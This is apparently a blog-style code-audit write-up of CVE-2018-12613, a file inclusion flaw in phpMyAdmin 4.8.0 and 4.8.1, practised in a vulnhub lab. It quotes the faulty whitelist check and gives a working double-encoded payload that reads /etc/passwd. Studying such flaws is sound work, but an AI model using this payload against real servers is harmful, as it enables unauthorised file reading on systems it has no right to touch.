当前位置:网站首页>A code audit notes (CVE - 2018-12613 phpmyadmin file contains loopholes)
A code audit notes (CVE - 2018-12613 phpmyadmin file contains loopholes)
2022-08-02 04:02:00 【Learn Safe Tom Cat】
前言
I looked at the last blog post20天前的事了,Going to work recently,Learning a lot less,Played it two days agovulhub靶场的phpmyadmin文件包含漏洞(CVE-2018-12613)But some don't understand,By taking time out of Baidu and understanding,写一下笔记,Don't forget about it
漏洞描述
攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞.该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,
以及对白名单页面进行不正确的测试. 攻击者必须经过身份验证,但在这些情况下除外:
$ cfg [‘AllowArbitraryServer’] =
true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’]
= 0:这会绕过登录并在没有任何身份验证的情况下运行易受攻击的代码.
漏洞影响范围
phpMyAdmin 4.8.0和4.8.1
漏洞分析
查看index.php的50行到63行内容
target_blacklist = array (
'import.php', 'export.php'
); #定义了一个黑名单
// If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) #要求target不为空 && is_string($_REQUEST['target']) #要求target为字符串 && ! preg_match('/^index/', $_REQUEST['target']) #要求target不已index开头 && ! in_array($_REQUEST['target'], $target_blacklist) #要求targetNot in the blacklist && Core::checkPageValidity($_REQUEST['target']) #checkPageValidity要为真 ) { include $_REQUEST['target']; #The above five conditions are met to include the file
exit;
}
The first four conditions are easily met,It is the fifth condition that is a little more troublesome
查看Coer.php的443行到476行
public static function checkPageValidity(&$page, array $whitelist = [])
{
if (empty($whitelist)) {
$whitelist = self::$goto_whitelist; #Initialize the whitelist
}
if (! isset($page) || !is_string($page)) {
return false; #Return if the input and output parameters are empty or not stringsfalse
}
if (in_array($page, $whitelist)) {
return true; #Determines that the incoming parameters are in the whitelist,则返回true
}
#如果这里返回false就执行以下代码
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?') #Intercept incoming parameters to start?中间的字符串
);
if (in_array($_page, $whitelist)) {
return true; #If it is judged again that it exists in the whitelist, it will returntrue
}
#If here is also returnedfalse就执行以下代码
$_page = urldecode($page); #The main trigger of this vulnerability is here,这里进行了一次url解码
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?') #Intercept incoming parameters to start?中间的字符串
);
if (in_array($_page, $whitelist)) {
return true; #Determines that the incoming parameters are in the whitelist,则返回true
}
#如果这里返回false就直接返回false
return false;
}
白名单在core.php的31行到79行
public static $goto_whitelist = array(
'db_datadict.php',
'db_sql.php',
'db_events.php',
'db_export.php',
'db_importdocsql.php',
'db_multi_table_query.php',
'db_structure.php',
'db_import.php',
'db_operations.php',
'db_search.php',
'db_routines.php',
'export.php',
'import.php',
'index.php',
'pdf_pages.php',
'pdf_schema.php',
'server_binlog.php',
'server_collations.php',
'server_databases.php',
'server_engines.php',
'server_export.php',
'server_import.php',
'server_privileges.php',
'server_sql.php',
'server_status.php',
'server_status_advisor.php',
'server_status_monitor.php',
'server_status_queries.php',
'server_status_variables.php',
'server_variables.php',
'sql.php',
'tbl_addfield.php',
'tbl_change.php',
'tbl_create.php',
'tbl_import.php',
'tbl_indexes.php',
'tbl_sql.php',
'tbl_export.php',
'tbl_operations.php',
'tbl_structure.php',
'tbl_relation.php',
'tbl_replace.php',
'tbl_row_action.php',
'tbl_select.php',
'tbl_zoom_select.php',
'transformation_overview.php',
'transformation_wrapper.php',
'user_password.php',
playload:index.php?target=sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd
解释:target=sql.php%253f 在服务器收到urldecode once,变成?target=sql.php%3f ;再通过urldecode时,在进行一次url解码,变成?target=sql.php?,符合?The previous one was in the whitelist.所以就绕过了checkPageValidity()方法.
总结
Although it is said that a filtering judgment is carried out here,But he hasn't changed the value we passed in first,Therefore, the vulnerability of arbitrary file inclusion occurs.
The above is my understanding of this vulnerability,如有不对之处,也请大家指出
Talk about your problem,Although it was written down,But in the code audit process,There are still many functions that are not understood,Next time to learnphp和javafor future code audits,This is also my first code audit article,If you don't write clearly and incorrectly, please let us know!
边栏推荐
- Praying: 1 vulnhub walkthrough
- 利用cookie获取admin权限 CTF基础题
- Batch replace file fonts, Simplified -> Traditional
- (6) Design of student information management system
- xxe of CTF
- IO stream, encoding table, character stream, character buffer stream
- Alfa: 1 vulnhub walkthrough
- (4) 函数、Bug、类与对象、封装、继承、多态、拷贝
- Using PHPMailer send mail
- What will be new in PHP8.2?
猜你喜欢
web渗透必玩的靶场——DVWA靶场 1(centos8.2+phpstudy安装环境)
Introduction to PHP (self-study notes)
(6) Design of student information management system
Command Execution Vulnerability
(3) Thinkphp6 database
(4) 函数、Bug、类与对象、封装、继承、多态、拷贝
(2)Thinkphp6模板引擎**标签
4.表单与输入
Thread Pool (Introduction and Use of Thread Pool)
TypeScript error error TS2469, error TS2731 solution
随机推荐
PHP Foundation March Press Announcement Released
Solve the problem of uni - app packaged H5 website to download image
IP access control: teach you how to implement an IP firewall with PHP
(5) 模块与包、编码格式、文件操作、目录操作
1. Beginning with PHP
一个网络安全小白鼠的学习之路——nmap的基本使用
hackmyvm: again walkthrough
Stable and easy-to-use short connection generation platform, supporting API batch generation
[league/flysystem] An elegant and highly supported file operation interface
What are the PHP framework?
Alfa: 1 vulnhub walkthrough
[mikehaertl/php-shellcommand] A library for invoking external command operations
Several interesting ways to open PHP: from basic to perverted
Eric靶机渗透测试通关全教程
DVWA靶机安装教程
(8) requests、os、sys、re、_thread
[symfony/finder] The best file manipulation library
Smart Tips for Frida Scripting in Kali Environment
动力:2 vulnhub预排
PHP realizes the automatic reverse search prompt of the search box